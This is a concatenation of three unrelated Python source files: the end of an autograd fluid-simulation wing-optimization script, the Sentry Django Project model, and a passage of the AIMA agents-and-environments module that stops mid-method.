vy = vy - 0.5*(np.roll(p, -1, axis=0) - np.roll(p, 1, axis=0))
vx = occlude(vx, occlusion)
vy = occlude(vy, occlusion)
return vx, vy
def advect(f, vx, vy):
"""Move field f according to x and y velocities (u and v)
using an implicit Euler integrator."""
rows, cols = f.shape
cell_xs, cell_ys = np.meshgrid(np.arange(cols), np.arange(rows))
center_xs = (cell_xs - vx).ravel()
center_ys = (cell_ys - vy).ravel()
# Compute indices of source cells.
left_ix = np.floor(center_ys).astype(np.int)
top_ix = np.floor(center_xs).astype(np.int)
rw = center_ys - left_ix # Relative weight of right-hand cells.
bw = center_xs - top_ix # Relative weight of bottom cells.
left_ix = np.mod(left_ix, rows) # Wrap around edges of simulation.
right_ix = np.mod(left_ix + 1, rows)
top_ix = np.mod(top_ix, cols)
bot_ix = np.mod(top_ix + 1, cols)
# A linearly-weighted sum of the 4 surrounding cells.
flat_f = (1 - rw) * ((1 - bw)*f[left_ix, top_ix] + bw*f[left_ix, bot_ix]) \
+ rw * ((1 - bw)*f[right_ix, top_ix] + bw*f[right_ix, bot_ix])
return np.reshape(flat_f, (rows, cols))
def make_continuous(f, occlusion):
non_occluded = 1 - occlusion
num = np.roll(f, 1, axis=0) * np.roll(non_occluded, 1, axis=0)\
+ np.roll(f, -1, axis=0) * np.roll(non_occluded, -1, axis=0)\
+ np.roll(f, 1, axis=1) * np.roll(non_occluded, 1, axis=1)\
+ np.roll(f, -1, axis=1) * np.roll(non_occluded, -1, axis=1)
den = np.roll(non_occluded, 1, axis=0)\
+ np.roll(non_occluded, -1, axis=0)\
+ np.roll(non_occluded, 1, axis=1)\
+ np.roll(non_occluded, -1, axis=1)
return f * non_occluded + (1 - non_occluded) * num / ( den + 0.001)
def sigmoid(x):
return 0.5*(np.tanh(x) + 1.0) # Output ranges from 0 to 1.
def simulate(vx, vy, num_time_steps, occlusion, ax=None, render=False):
occlusion = sigmoid(occlusion)
# Disallow occlusion outside a certain area.
mask = np.zeros((rows, cols))
mask[10:30, 10:30] = 1.0
occlusion = occlusion * mask
# Initialize smoke bands.
red_smoke = np.zeros((rows, cols))
red_smoke[rows/4:rows/2] = 1
blue_smoke = np.zeros((rows, cols))
blue_smoke[rows/2:3*rows/4] = 1
print("Running simulation...")
vx, vy = project(vx, vy, occlusion)
for t in range(num_time_steps):
plot_matrix(ax, red_smoke, occlusion, blue_smoke, t, render)
vx_updated = advect(vx, vx, vy)
vy_updated = advect(vy, vx, vy)
vx, vy = project(vx_updated, vy_updated, occlusion)
red_smoke = advect(red_smoke, vx, vy)
red_smoke = occlude(red_smoke, occlusion)
blue_smoke = advect(blue_smoke, vx, vy)
blue_smoke = occlude(blue_smoke, occlusion)
plot_matrix(ax, red_smoke, occlusion, blue_smoke, num_time_steps, render)
return vx, vy
def plot_matrix(ax, r, g, b, t, render=False):
if ax:
plt.cla()
ax.imshow(np.concatenate((r[...,np.newaxis], g[...,np.newaxis], b[...,np.newaxis]), axis=2))
ax.set_xticks([])
ax.set_yticks([])
plt.draw()
if render:
plt.savefig('step{0:03d}.png'.format(t), bbox_inches='tight')
plt.pause(0.001)
if __name__ == '__main__':
simulation_timesteps = 20
print("Loading initial and target states...")
init_vx = np.ones((rows, cols))
init_vy = np.zeros((rows, cols))
# Initialize the occlusion to be a block.
init_occlusion = -np.ones((rows, cols))
init_occlusion[15:25, 15:25] = 0.0
init_occlusion = init_occlusion.ravel()
def drag(vx): return np.mean(init_vx - vx)
def lift(vy): return np.mean(vy - init_vy)
def objective(params):
cur_occlusion = np.reshape(params, (rows, cols))
final_vx, final_vy = simulate(init_vx, init_vy, simulation_timesteps, cur_occlusion)
return -lift(final_vy) / drag(final_vx)
# Specify gradient of objective function using autograd.
objective_with_grad = value_and_grad(objective)
fig = plt.figure(figsize=(8,8))
ax = fig.add_subplot(111, frameon=False)
def callback(weights):
cur_occlusion = np.reshape(weights, (rows, cols))
simulate(init_vx, init_vy, simulation_timesteps, cur_occlusion, ax)
print("Rendering initial flow...")
callback(init_occlusion)
print("Optimizing initial conditions...")
result = minimize(objective_with_grad, init_occlusion, jac=True, method='CG',
options={'maxiter':50, 'disp':True}, callback=callback)
print("Rendering optimized flow...")
final_occlusion = np.reshape(result.x, (rows, cols))
simulate(init_vx, init_vy, simulation_timesteps, final_occlusion, ax, render=True)
print("Converting frames to an animated GIF...") # Using imagemagick.
os.system("convert -delay 5 -loop 0 step*.png "
"-delay 250 step{0:03d}.png wing.gif".format(simulation_timesteps))
os.system("rm step*.png")
|
"""
sentry.models.project
~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2014 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import, print_function
import logging
import six
import warnings
from bitfield import BitField
from django.conf import settings
from django.db import models
from django.db.models import F
from django.utils import timezone
from django.utils.translation import ugettext_lazy as _
from sentry.app import locks
from sentry.constants import ObjectStatus
from sentry.db.models import (
BaseManager, BoundedPositiveIntegerField, FlexibleForeignKey, Model,
sane_repr
)
from sentry.db.models.utils import slugify_instance
from sentry.utils.colors import get_hashed_color
from sentry.utils.http import absolute_uri
from sentry.utils.retries import TimedRetryPolicy
# TODO(dcramer): pull in enum library
ProjectStatus = ObjectStatus
class ProjectManager(BaseManager):
# TODO(dcramer): we might want to cache this per user
def get_for_user(self, team, user, scope=None, _skip_team_check=False):
from sentry.models import Team
if not (user and user.is_authenticated()):
return []
if not _skip_team_check:
team_list = Team.objects.get_for_user(
organization=team.organization,
user=user,
scope=scope,
)
try:
team = team_list[team_list.index(team)]
except ValueError:
logging.info('User does not have access to team: %s', team.id)
return []
base_qs = self.filter(
team=team,
status=ProjectStatus.VISIBLE,
)
project_list = []
for project in base_qs:
project.team = team
project_list.append(project)
return sorted(project_list, key=lambda x: x.name.lower())
class Project(Model):
"""
Projects are permission based namespaces which generally
are the top level entry point for all data.
"""
__core__ = True
slug = models.SlugField(null=True)
name = models.CharField(max_length=200)
forced_color = models.CharField(max_length=6, null=True, blank=True)
organization = FlexibleForeignKey('sentry.Organization')
team = FlexibleForeignKey('sentry.Team')
public = models.BooleanField(default=False)
date_added = models.DateTimeField(default=timezone.now)
status = BoundedPositiveIntegerField(default=0, choices=(
(ObjectStatus.VISIBLE, _('Active')),
(ObjectStatus.PENDING_DELETION, _('Pending Deletion')),
(ObjectStatus.DELETION_IN_PROGRESS, _('Deletion in Progress')),
), db_index=True)
# projects that were created before this field was present
# will have their first_event field set to date_added
first_event = models.DateTimeField(null=True)
flags = BitField(flags=(
('has_releases', 'This Project has sent release data'),
), default=0, null=True)
objects = ProjectManager(cache_fields=[
'pk',
'slug',
])
class Meta:
app_label = 'sentry'
db_table = 'sentry_project'
unique_together = (('team', 'slug'), ('organization', 'slug'))
__repr__ = sane_repr('team_id', 'name', 'slug')
def __unicode__(self):
return u'%s (%s)' % (self.name, self.slug)
def next_short_id(self):
from sentry.models import Counter
return Counter.increment(self)
def save(self, *args, **kwargs):
if not self.slug:
lock = locks.get('slug:project', duration=5)
with TimedRetryPolicy(10)(lock.acquire):
slugify_instance(self, self.name, organization=self.organization)
super(Project, self).save(*args, **kwargs)
else:
super(Project, self).save(*args, **kwargs)
def get_absolute_url(self):
return absolute_uri('/{}/{}/'.format(self.organization.slug, self.slug))
def merge_to(self, project):
from sentry.models import (
Group, GroupTagValue, Event, TagValue
)
if not isinstance(project, Project):
project = Project.objects.get_from_cache(pk=project)
for group in Group.objects.filter(project=self):
try:
other = Group.objects.get(
project=project,
)
except Group.DoesNotExist:
group.update(project=project)
GroupTagValue.objects.filter(
project_id=self.id,
group_id=group.id,
).update(project_id=project.id)
else:
Event.objects.filter(
group_id=group.id,
).update(group_id=other.id)
for obj in GroupTagValue.objects.filter(group=group):
obj2, created = GroupTagValue.objects.get_or_create(
project_id=project.id,
group_id=group.id,
key=obj.key,
value=obj.value,
defaults={'times_seen': obj.times_seen}
)
if not created:
obj2.update(times_seen=F('times_seen') + obj.times_seen)
for fv in TagValue.objects.filter(project=self):
TagValue.objects.get_or_create(project=project, key=fv.key, value=fv.value)
fv.delete()
self.delete()
def is_internal_project(self):
for value in (settings.SENTRY_FRONTEND_PROJECT, settings.SENTRY_PROJECT):
if six.text_type(self.id) == six.text_type(value) or six.text_type(self.slug) == six.text_type(value):
return True
return False
def get_tags(self, with_internal=True):
from sentry.models import TagKey
if not hasattr(self, '_tag_cache'):
tags = self.get_option('tags', None)
if tags is None:
tags = [
t for t in TagKey.objects.all_keys(self)
if with_internal or not t.startswith('sentry:')
]
self._tag_cache = tags
return self._tag_cache
# TODO: Make these a mixin
def update_option(self, *args, **kwargs):
from sentry.models import ProjectOption
return ProjectOption.objects.set_value(self, *args, **kwargs)
def get_option(self, *args, **kwargs):
from sentry.models import ProjectOption
return ProjectOption.objects.get_value(self, *args, **kwargs)
def delete_option(self, *args, **kwargs):
from sentry.models import ProjectOption
return ProjectOption.objects.unset_value(self, *args, **kwargs)
@property
def callsign(self):
return self.slug.upper()
@property
def color(self):
if self.forced_color is not None:
return '#%s' % self.forced_color
return get_hashed_color(self.callsign or self.slug)
@property
def member_set(self):
from sentry.models import OrganizationMember
return self.organization.member_set.filter(
id__in=OrganizationMember.objects.filter(
organizationmemberteam__is_active=True,
organizationmemberteam__team=self.team,
).values('id'),
user__is_active=True,
).distinct()
def has_access(self, user, access=None):
from sentry.models import AuthIdentity, OrganizationMember
warnings.warn('Project.has_access is deprecated.', DeprecationWarning)
queryset = self.member_set.filter(user=user)
if access is not None:
queryset = queryset.filter(type__lte=access)
try:
member = queryset.get()
except OrganizationMember.DoesNotExist:
return False
try:
auth_identity = AuthIdentity.objects.get(
auth_provider__organization=self.organization_id,
user=member.user_id,
)
except AuthIdentity.DoesNotExist:
return True
return auth_identity.is_valid(member)
def get_audit_log_data(self):
return {
'id': self.id,
'slug': self.slug,
'name': self.name,
'status': self.status,
'public': self.public,
}
def get_full_name(self):
if self.team.name not in self.name:
return '%s %s' % (self.team.name, self.name)
return self.name
def get_notification_recipients(self, user_option):
from sentry.models import UserOption
alert_settings = dict(
(o.user_id, int(o.value))
for o in UserOption.objects.filter(
project=self,
key=user_option,
)
)
disabled = set(u for u, v in six.iteritems(alert_settings) if v == 0)
member_set = set(self.member_set.exclude(
user__in=disabled,
).values_list('user', flat=True))
# determine members default settings
members_to_check = set(u for u in member_set if u not in alert_settings)
if members_to_check:
disabled = set((
uo.user_id for uo in UserOption.objects.filter(
key='subscribe_by_default',
user__in=members_to_check,
)
if uo.value == '0'
))
member_set = [x for x in member_set if x not in disabled]
return member_set
def get_mail_alert_subscribers(self):
user_ids = self.get_notification_recipients('mail:alert')
if not user_ids:
return []
from sentry.models import User
return list(User.objects.filter(id__in=user_ids))
def is_user_subscribed_to_mail_alerts(self, user):
from sentry.models import UserOption
is_enabled = UserOption.objects.get_value(
user,
'mail:alert',
project=self
)
if is_enabled is None:
is_enabled = UserOption.objects.get_value(
user,
'subscribe_by_default',
'1'
) == '1'
else:
is_enabled = bool(is_enabled)
return is_enabled
def is_user_subscribed_to_workflow(self, user):
from sentry.models import UserOption, UserOptionValue
opt_value = UserOption.objects.get_value(
user,
'workflow:notifications',
project=self
)
if opt_value is None:
opt_value = UserOption.objects.get_value(
user,
'workflow:notifications',
UserOptionValue.all_conversations
)
return opt_value == UserOptionValue.all_conversations
|
"""Implement Agents and Environments (Chapters 1-2).
The class hierarchies are as follows:
Thing ## A physical object that can exist in an environment
Agent
Wumpus
Dirt
Wall
...
Environment ## An environment holds objects, runs simulations
XYEnvironment
VacuumEnvironment
WumpusEnvironment
An agent program is a callable instance, taking percepts and choosing actions
SimpleReflexAgentProgram
...
EnvGUI ## A window with a graphical representation of the Environment
EnvToolbar ## contains buttons for controlling EnvGUI
EnvCanvas ## Canvas to display the environment of an EnvGUI
"""
# TO DO:
# Implement grabbing correctly.
# When an object is grabbed, does it still have a location?
# What if it is released?
# What if the grabbed or the grabber is deleted?
# What if the grabber moves?
#
# Speed control in GUI does not have any effect -- fix it.
from grid import distance_squared, turn_heading
from statistics import mean
import random
import copy
import collections
# ______________________________________________________________________________
class Thing:
"""This represents any physical object that can appear in an Environment.
You subclass Thing to get the things you want. Each thing can have a
.__name__ slot (used for output only)."""
def __repr__(self):
return '<{}>'.format(getattr(self, '__name__', self.__class__.__name__))
def is_alive(self):
"""Things that are 'alive' should return true."""
return hasattr(self, 'alive') and self.alive
def show_state(self):
"""Display the agent's internal state. Subclasses should override."""
print("I don't know how to show_state.")
def display(self, canvas, x, y, width, height):
"""Display an image of this Thing on the canvas."""
# Do we need this?
pass
class Agent(Thing):
"""An Agent is a subclass of Thing with one required slot,
.program, which should hold a function that takes one argument, the
percept, and returns an action. (What counts as a percept or action
will depend on the specific environment in which the agent exists.)
Note that 'program' is a slot, not a method. If it were a method,
then the program could 'cheat' and look at aspects of the agent.
It's not supposed to do that: the program can only look at the
percepts. An agent program that needs a model of the world (and of
the agent itself) will have to build and maintain its own model.
There is an optional slot, .performance, which is a number giving
the performance measure of the agent in its environment."""
def __init__(self, program=None):
self.alive = True
self.bump = False
self.holding = []
self.performance = 0
if program is None:
def program(percept):
return eval(input('Percept={}; action? '.format(percept)))
assert isinstance(program, collections.Callable)
self.program = program
def can_grab(self, thing):
"""Returns True if this agent can grab this thing.
Override for appropriate subclasses of Agent and Thing."""
return False
def TraceAgent(agent):
"""Wrap the agent's program to print its input and output. This will let
you see what the agent is doing in the environment."""
old_program = agent.program
def new_program(percept):
action = old_program(percept)
print('{} perceives {} and does {}'.format(agent, percept, action))
return action
agent.program = new_program
return agent
# ______________________________________________________________________________
def TableDrivenAgentProgram(table):
"""This agent selects an action based on the percept sequence.
It is practical only for tiny domains.
To customize it, provide as table a dictionary of all
{percept_sequence:action} pairs. [Figure 2.7]"""
percepts = []
def program(percept):
percepts.append(percept)
action = table.get(tuple(percepts))
return action
return program
def RandomAgentProgram(actions):
"""An agent that chooses an action at random, ignoring all percepts."""
return lambda percept: random.choice(actions)
# ______________________________________________________________________________
def SimpleReflexAgentProgram(rules, interpret_input):
"""This agent takes action based solely on the percept. [Figure 2.10]"""
def program(percept):
state = interpret_input(percept)
rule = rule_match(state, rules)
action = rule.action
return action
return program
def ModelBasedReflexAgentProgram(rules, update_state, model):
"""This agent takes action based on the percept and state. [Figure 2.12]"""
def program(percept):
program.state = update_state(program.state, program.action, percept, model)
rule = rule_match(program.state, rules)
action = rule.action
return action
program.state = program.action = None
return program
def rule_match(state, rules):
"""Find the first rule that matches state."""
for rule in rules:
if rule.matches(state):
return rule
# ______________________________________________________________________________
loc_A, loc_B = (0, 0), (1, 0) # The two locations for the Vacuum world
def RandomVacuumAgent():
"""Randomly choose one of the actions from the vacuum environment."""
return Agent(RandomAgentProgram(['Right', 'Left', 'Suck', 'NoOp']))
def TableDrivenVacuumAgent():
"""[Figure 2.3]"""
table = {((loc_A, 'Clean'),): 'Right',
((loc_A, 'Dirty'),): 'Suck',
((loc_B, 'Clean'),): 'Left',
((loc_B, 'Dirty'),): 'Suck',
((loc_A, 'Clean'), (loc_A, 'Clean')): 'Right',
((loc_A, 'Clean'), (loc_A, 'Dirty')): 'Suck',
# ...
((loc_A, 'Clean'), (loc_A, 'Clean'), (loc_A, 'Clean')): 'Right',
((loc_A, 'Clean'), (loc_A, 'Clean'), (loc_A, 'Dirty')): 'Suck',
# ...
}
return Agent(TableDrivenAgentProgram(table))
def ReflexVacuumAgent():
"""A reflex agent for the two-state vacuum environment. [Figure 2.8]"""
def program(percept):
location, status = percept
if status == 'Dirty':
return 'Suck'
elif location == loc_A:
return 'Right'
elif location == loc_B:
return 'Left'
return Agent(program)
def ModelBasedVacuumAgent():
"""An agent that keeps track of what locations are clean or dirty."""
model = {loc_A: None, loc_B: None}
def program(percept):
"""Same as ReflexVacuumAgent, except if everything is clean, do NoOp."""
location, status = percept
model[location] = status # Update the model here
if model[loc_A] == model[loc_B] == 'Clean':
return 'NoOp'
elif status == 'Dirty':
return 'Suck'
elif location == loc_A:
return 'Right'
elif location == loc_B:
return 'Left'
return Agent(program)
# ______________________________________________________________________________
class Environment:
"""Abstract class representing an Environment. 'Real' Environment classes
inherit from this. Your Environment will typically need to implement:
percept: Define the percept that an agent sees.
execute_action: Define the effects of executing an action.
Also update the agent.performance slot.
The environment keeps a list of .things and .agents (which is a subset
of .things). Each agent has a .performance slot, initialized to 0.
Each thing has a .location slot, even though some environments may not
need this."""
def __init__(self):
self.things = []
self.agents = []
def thing_classes(self):
return [] # List of classes that can go into environment
def percept(self, agent):
"""Return the percept that the agent sees at this point. (Implement this.)"""
raise NotImplementedError
def execute_action(self, agent, action):
"""Change the world to reflect this action. (Implement this.)"""
raise NotImplementedError
def default_location(self, thing):
"""Default location to place a new thing with unspecified location."""
return None
def exogenous_change(self):
"""If there is spontaneous change in the world, override this."""
pass
def is_done(self):
"""By default, we're done when we can't find a live agent."""
return not any(agent.is_alive() for agent in self.agents)
def step(self):
"""Run the environment for one time step. If the
actions and exogenous changes are independent, this method will
do. If there are interactions between them, you'll need to
override this method."""
if not self.is_done():
actions = []
for agent in self.agents:
if agent.alive:
actions.append(agent.program(self.percept(agent)))
else:
actions.append("")
for (agent, action) in zip(self.agents, actions):
self.execute_action(agent, action)
self.exogenous_change()
def run(self, steps=1000):
"""Run the Environment for given number of time steps."""
for step in range(steps):
if self.is_done():
return
self.step()
def list_things_at(self, location, tclass=Thing):
"""Return all things exactly at a given location."""
return [thing for thing in self.things
if thing.location == location and isinstance(thing, tclass)]
def some_things_at(self, location, tclass=Thing):
"""Return true if at least one of the things at location
is an instance of class tclass (or a subclass)."""
return self.list_things_at(location, tclass) != []
def add_thing(self, thing, location=None):
"""Add a thing to the environment, setting its location. For
convenience, if thing is an agent program we make a new agent
for it. (Shouldn't need to override this."""
if not isinstance(thing, Thing):
thing = Agent(thing)
assert thing not in self.things, "Don't add the same thing twice"
thing.location = location if location is not None else self.default_location(thing)
self.things.append(thing)
if isinstance(thing, Agent):
thing.performance = 0
self.agents.append(thing)
def delete_thing(self, thing):
"""Remove a thing from the environment."""
try:
self.things.remove(thing)
except ValueError as e:
print(e)
print(" in Environment delete_thing")
print(" Thing to be removed: {} at {}".format(thing, thing.location))
print(" from list: {}".format([(thing, thing.location) for thing in self.things]))
if thing in self.agents:
self.agents.remove(thing)
class Direction:
"""A direction class for agents that want to move in a 2D plane
Usage:
d = Direction("down")
To change directions:
d = d + "right" or d = d + Direction.R #Both do the same thing
Note that the argument to __add__ must be a string and not a Direction object.
Also, it (the argument) can only be right or left."""
R = "right"
L = "left"
U = "up"
D = "down"
def __init__(self, direction):
self.direction = direction
def __add__(self, heading):
if self.direction == self.R:
return{
self.R: Direction(self.D),
self.L: Direction(self.U),
}.get(heading, None)
elif self.direction == self.L:
return{
self.R: Direction(self.U),
self.L: Direction(self.D),
}.get(heading, None)
elif self.direction == self.U:
return{
self.R: Direction(self.R),
self.L: Direction(self.L),
}.get(heading, None)
elif self.direction == self.D:
return{
self.R: Direction(self.L),
self.L: Direction(self.R),
}.get(heading, None)
def move_forward(self, from_location):
x, y = from_location
if self.direction == self.R:
return (x+1, y)
elif self.direction == self.L:
return (x-1, y)
elif self.direction == self.U:
return (x, y-1)
elif self.direction == self.D:
return (x, y+1)
class XYEnvironment(Environment):
"""This class is for environments on a 2D plane, with locations
labelled by (x, y) points, either discrete or continuous.
Agents perceive things within a radius. Each agent in the
environment has a .location slot which should be a location such
as (0, 1), and a .holding slot, which should be a list of things
that are held."""
def __init__(self, width=10, height=10):
super().__init__()
self.width = width
self.height = height
self.observers = []
# Sets iteration start and end (no walls).
self.x_start, self.y_start = (0, 0)
self.x_end, self.y_end = (self.width, self.height)
perceptible_distance = 1
def things_near(self, location, radius=None):
"""Return all things within radius of location."""
if radius is None:
radius = self.perceptible_distance
radius2 = radius * radius
return [(thing, radius2 - distance_squared(location, thing.location))
for thing in self.things if distance_squared(
location, thing.location) <= radius2]
def percept(self, agent):
"""By default, agent perceives things within a default radius."""
return self.things_near(agent.location)
def execute_action(self, agent, action):
agent.bump = False
if action == 'TurnRight':
agent.direction = agent.direction + Direction.R
elif action == 'TurnLeft':
agent.direction = agent.direction + Direction.L
elif action == 'Forward':
agent.bump = self.move_to(agent, agent.direction.move_forward(agent.location))
# elif action == 'Grab':
# things = [thing for thing in self.list_things_at(agent.location)
# if agent.can_grab(thing)]
# if things:
# agent.holding.append(things[0])
elif action == 'Release':
if agent.holding:
agent.holding.pop()
def default_location(self, thing):
return (random.choice(self.width), random.choice(self.height))
def move_to(self, thing, destination):
"""Move a thing to a new location. Returns True on success or False if there is an Obstacle.
If thing is holding anything, they move with him."""
thing.bump = self.some_things_at(destination, Obstacle)
if not thing.bump:
thing.location = destination
for o in self.observers:
o.thing_moved(thing)
for t in thing.holding:
self.delete_thing(t)
self.add_thing(t, destination)
t.location = destination
return thing.bump
def add_thing(self, thing, location=(1, 1), exclude_duplicate_class_items=False):
"""Adds things to the world. If (exclude_duplicate_class_items) then the item won't be
added if the location has at least one item of the same class."""
if (self.is_inbounds(location)):
if (exclude_duplicate_class_items and
any(isinstance(t, thing.__class__) for t in self.list_things_at(location))):
return
super().add_thing(thing, location)
def is_inbounds(self, location):
"""Checks to make sure that the location is inbounds (within walls if we have walls)"""
x, y = location
return not (x < self.x_start or x >= self.x_end or y < self.y_start or y >= self.y_end)
def random_location_inbounds(self, exclude=None):
"""Returns a random location that is inbounds (within walls if we have walls)"""
location = (random.randint(self.x_start, self.x_end),
random.randint(self.y_start, self.y_end))
if exclude is not None:
while(location == exclude):
location = (random.randint(self.x_start, self.x_end),
random.randint(self.y_start, self.y_end))
return location
def delete_thing(self, thing):
"""Deletes thing, and everything it is holding (if thing is an agent)"""
if isinstance(thing, Agent):
for obj in thing.holding:
super().delete_thing(obj)
for obs in self.observers:
obs.thing_deleted(obj)
super().delete_thing(thing)
for obs in self.observers:
obs.thing_deleted(thing)
def add_walls(self):
"""Put walls around the entire perimeter of the grid."""
for x in range(self.width):
self.add_thing(Wall(), (x, 0))
self.add_thing(Wall(), (x, self.height - 1))
for y in range(self.height):
self.add_thing(Wall(), (0, y))
self.add_thing(Wall(), (self.width - 1, y))
# Updates iteration start and end (with walls).
self.x_start, self.y_start = (1, 1)
self.x_end, self.y_end = (self.width - 1, self.height - 1)
def add_observer(self, observer):
"""Adds an observer to the list of observers.
An observer is typically an EnvGUI.
Each observer is notified of changes in move_to and add_thing,
by calling the observer's methods thing_moved(thing)
and thing_added(thing, loc)."""
self.observers.append(observer)
def turn_heading(self, heading, inc):
"""Return the heading to the left (inc=+1) or right (inc=-1) of heading."""
return turn_heading(heading, inc)
class Obstacle(Thing):
"""Something that can cause a bump, preventing an agent from
moving into the same square it's in."""
pass
class Wall(Obstacle):
pass
# ______________________________________________________________________________
try:
from ipythonblocks import BlockGrid
from IPython.display import HTML, display
from time import sleep
except:
pass
class GraphicEnvironment(XYEnvironment):
def __init__(self, width=10, height=10, boundary=True, color={}, display=False):
"""define all the usual XYEnvironment characteristics,
but initialise a BlockGrid for GUI too"""
super().__init__(width, height)
self.grid = BlockGrid(width, height, fill=(200, 200, 200))
if display:
self.grid.show()
self.visible = True
else:
self.visible = False
self.bounded = boundary
self.colors = color
def get_world(self):
"""Returns all the items in the world in a format
understandable by the ipythonblocks BlockGrid"""
result = []
x_start, y_start = (0, 0)
x_end, y_end = self.width, self.height
for x in range(x_start, x_end):
row = []
for y in range(y_start, y_end):
row.append(self.list_things_at([x, y]))
result.append(row)
return result
"""def run(self, steps=1000, delay=1):
"" "Run the Environment for given number of time steps,
but update the GUI too." ""
for step in range(steps):
sleep(delay)
if self.visible:
self.reveal()
if self.is_done():
if self.visible:
self.reveal()
return
self.step()
if self.visible:
self.reveal()
"""
def run(self, steps=1000, delay=1):
"""Run the Environment for given number of time steps,
but update the GUI too."""
for step in range(steps):
self.update(delay)
if self.is_done():
break
self.step()
self.update(delay)
def update(self, delay=1):
sleep(delay)
if self.visible:
self.conceal()
self.reveal()
else:
self.reveal()
def reveal(self):
"""display the BlockGrid for this world - the last thing to be added
at a location defines the location color"""
self.draw_world()
self.grid.show()
self.visible = True
def draw_world(self):
self.grid[:] = (200, 200, 200)
world = self.get_world()
for x in range(0, len(world)):
for y in range(0, len(world[x])):
if len(world[x][y]):
self.grid[y, x] = self.colors[world[x][y][-1].__class__.__name__]
def conceal(self):
"""hide the BlockGrid for this world"""
self.visible = False
display(HTML(''))
# ______________________________________________________________________________
# Continuous environment
class ContinuousWorld(Environment):
"""Model for Continuous World."""
def __init__(self, width=10, height=10):
super().__init__()
self.width = width
self.height = height
def add_obstacle(self, coordinates):
self.things.append(PolygonObstacle(coordinates))
class PolygonObstacle(Obstacle):
def __init__(self, coordinates):
""" Coordinates is a list of tuples."""
super().__init__()
self.coordinates = coordinates
# ______________________________________________________________________________
# Vacuum environment
class Dirt(Thing):
pass
class VacuumEnvironment(XYEnvironment):
"""The environment of [Ex. 2.12]. Agent perceives dirty or clean,
and bump (into obstacle) or not; 2D discrete world of unknown size;
performance measure is 100 for each dirt cleaned, and -1 for
each turn taken."""
def __init__(self, width=10, height=10):
super().__init__(width, height)
self.add_walls()
def thing_classes(self):
return [Wall, Dirt, ReflexVacuumAgent, RandomVacuumAgent,
TableDrivenVacuumAgent, ModelBasedVacuumAgent]
def percept(self, agent):
"""The percept is a tuple of ('Dirty' or 'Clean', 'Bump' or 'None').
Unlike the TrivialVacuumEnvironment, location is NOT perceived."""
status = ('Dirty' if self.some_things_at(
agent.location, Dirt) else 'Clean')
bump = ('Bump' if agent.bump else'None')
return (status, bump)
def execute_action(self, agent, action):
if action == 'Suck':
dirt_list = self.list_things_at(agent.location, Dirt)
if dirt_list != []:
dirt = dirt_list[0]
agent.performance += 100
self.delete_thing(dirt)
else:
super().execute_action(agent, action)
if action != 'NoOp':
agent.performance -= 1
class TrivialVacuumEnvironment(Environment):
"""This environment has two locations, A and B. Each can be Dirty
or Clean. The agent perceives its location and the location's
status. This serves as an example of how to implement a simple
Environment."""
def __init__(self):
super().__init__()
self.status = {loc_A: random.choice(['Clean', 'Dirty']),
loc_B: random.choice(['Clean', 'Dirty'])}
def thing_classes(self):
return [Wall, Dirt, ReflexVacuumAgent, RandomVacuumAgent,
TableDrivenVacuumAgent, ModelBasedVacuumAgent]
def percept(self, agent):
"""Returns the agent's location, and the location status (Dirty/Clean)."""
return (agent.location, self.status[agent.location])
def execute_action(self, agent, action):
"""Change agent's location and/or location's status; track performance.
Score 10 for each dirt cleaned; -1 for each move."""
if action == 'Right':
agent.location = loc_B
agent.performance -= 1
elif action == 'Left':
agent.location = loc_A
agent.performance -= 1
elif action == 'Suck':
if self.status[agent.location] == 'Dirty':
agent.performance += 10
self.status[agent.location] = 'Clean'
def default_location(self, thing):
"""Agents start in either location at random."""
return random.choice([loc_A, loc_B])
# ______________________________________________________________________________
# The Wumpus World
class Gold(Thing):
def __eq__(self, rhs):
"""All Gold are equal"""
return rhs.__class__ == Gold
pass
class Bump(Thing):
pass
class Glitter(Thing):
pass
class Pit(Thing):
pass
class Breeze(Thing):
pass
class Arrow(Thing):
pass
class Scream(Thing):
pass
class Wumpus(Agent):
screamed = False
pass
class Stench(Thing):
pass
class Explorer(Agent):
holding = []
has_arrow = True
killed_by = ""
direction = Direction("right")
def can_grab(self, thing):
"""Explorer can only grab gold"""
return thing.__class__ == Gold
class WumpusEnvironment(XYEnvironment):
pit_probability = 0.2 # Probability to spawn a pit in a location. (From Chapter 7.2)
# Room should be 4x4 grid of rooms. The extra 2 for walls
def __init__(self, agent_program, width=6, height=6):
super().__init__(width, height)
self.init_world(agent_program)
def init_world(self, program):
"""Spawn items to the world based on probabilities from the book"""
"WALLS"
self.add_walls()
"PITS"
for x in range(self.x_start, self.x_end):
for y in range(self.y_start, self.y_end):
if random.random() < self.pit_probability:
self.add_thing(Pit(), (x, y), True)
self.add_thing(Breeze(), (x - 1, y), True)
self.add_thing(Breeze(), (x, y - 1), True)
self.add_thing(Breeze(), (x + 1, y), True)
self.add_thing(Breeze(), (x, y + 1), True)
"WUMPUS"
w_x, w_y = self.random_location_inbounds(exclude=(1, 1))
self.add_thing(Wumpus(lambda x: ""), (w_x, w_y), True)
self.add_thing(Stench(), (w_x - 1, w_y), True)
self.add_thing(Stench(), (w_x + 1, w_y), True)
self.add_thing(Stench(), (w_x, w_y - 1), True)
self.add_thing(Stench(), (w_x, w_y + 1), True)
"GOLD"
self.add_thing(Gold(), self.random_location_inbounds(exclude=(1, 1)), True)
"AGENT"
self.add_thing(Explorer(program), (1, 1), True)
def get_world(self, show_walls=True):
"""Returns the items in the world"""
result = []
x_start, y_start = (0, 0) if show_walls else (1, 1)
if show_walls:
x_end, y_end = self.width, self.height
else:
x_end, y_end = self.width - 1, self.height - 1
for x in range(x_start, x_end):
row = []
for y in range(y_start, y_end):
row.append(self.list_things_at((x, y)))
result.append(row)
return result
def percepts_from(self, agent, location, tclass=Thing):
"""Returns percepts from a given location,
and replaces some items with percepts from chapter 7."""
thing_percepts = {
Gold: Glitter(),
Wall: Bump(),
Wumpus: Stench(),
Pit: Breeze()}
"""Agents don't need to get their percepts"""
thing_percepts[agent.__class__] = None
"""Gold only glitters in its cell"""
if location != agent.location:
thing_percepts[Gold] = None
result = [thing_percepts.get(thing.__class__, thing) for thing in self.things
if thing.location == location and isinstance(thing, tclass)]
return result if len(result) else [None]
def percept(self, agent):
"""Returns things in adjacent (not diagonal) cells of the agent.
Result format: [Left, Right, Up, Down, Center / Current location]"""
x, y = agent.location
result = []
result.append(self.percepts_from(agent, (x - 1, y)))
result.append(self.percepts_from(agent, (x + 1, y)))
result.append(self.percepts_from(agent, (x, y - 1)))
